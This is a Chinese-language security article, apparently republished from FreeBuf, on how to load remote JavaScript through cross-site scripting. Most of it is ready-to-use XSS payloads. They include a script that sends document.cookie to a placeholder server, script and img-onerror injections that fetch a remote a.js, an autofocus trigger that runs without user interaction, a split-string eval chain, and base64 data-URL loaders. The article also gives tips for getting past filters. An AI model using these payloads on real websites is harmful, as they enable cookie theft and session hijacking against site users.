前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >xss如何加载远程js的一些tips

xss如何加载远程js的一些tips

作者头像
FB客服
发布2018-02-02 11:36:22
3.7K0
发布2018-02-02 11:36:22
举报
文章被收录于专栏:FreeBufFreeBuf

在早期 , 对于xss我们是这样利用的

代码语言:javascript
复制
<script>window.open('http://xxx.xxx/cookie.asp?msg='+document.cookie)</script>

将 cookie之类的数据传递到自己的服务端

但是 如果要更为复杂的攻击的话,由于字符串长度等限制 需要加载远程js来实现。

一个简单的例子

代码语言:javascript
复制
<script src=http://xxx.xxx/a.js></script>

这样更为简洁

代码语言:javascript
复制
<script src=//xxx.xxx/a.js></script>

src属性会自己取当前页面的协议。

过滤了 <>的话 有时候可以用 %bf u003cu 等来绕过。

对于可以执行js的属性,我们可以控制其内容的话,可以基于DOM的方法创建和插入节点调用js

代码语言:javascript
复制
<img src=x onerror=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js'>

不要忘记 autofocus无须交互即可执行js。

代码语言:javascript
复制
<input autofocus="" onfocus="........" />

过滤了 script ‘ create 等关键字的话。 各种编码绕过即可。 你可以看下jin的这篇文章http://drops.wooyun.org/tips/689

或者用String.fromCharCode 函数转换成 asc码

但是string.fromcharcode 太长了,在同一个页面,可控多个输出的时候, 可以对全局变量 进行多次赋值

一个经典的例子

代码语言:javascript
复制
<script>z='document.'</script><script>z=z+'write("'</script>
<script>z=z+'<script'</script><script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script><script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script><script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script><script>eval_r(z)</script>

我们也可以用data url 来加载。

代码语言:javascript
复制
<object data="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3h4eC54eHgvYS5qcz48L3NjcmlwdD4=">
</object>
<iframe src="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3h4eC54eHgvYS5qcz48L3NjcmlwdD4=">
</iframe>

PHNjcmlwdCBzcmM9aHR0cDovL3h4eC54eHgvYS5qcz48L3NjcmlwdD4= 是

代码语言:javascript
复制
<script src=http://xxx.xxx/a.js></script>

的base64值。

支持data url 的标签还有

代码语言:javascript
复制
<anchor>、<img> <a>(需点击) <meta>.....

需注意的是

代码语言:javascript
复制
<img>

里的 data url 是不允许执行js的。

还有, ie8 以下浏览器是不支持 data url的。IE8 data URL 最大长度限制为32k字节,超出无效。IE9+没有这个限制 ie不支持对

代码语言:javascript
复制
<frame>

标签的src设置data URL

有时候 我们可以直接调用javascript框架的函数 来实现一些功能。

比如, 支持 jquery的话(通过查看源代码,你可以看出是否支持) 我们直接这样调用就可以了

代码语言:javascript
复制
$.getScript("//xxx.xxx/a.js");

实践出真理!

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2014-01-26,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档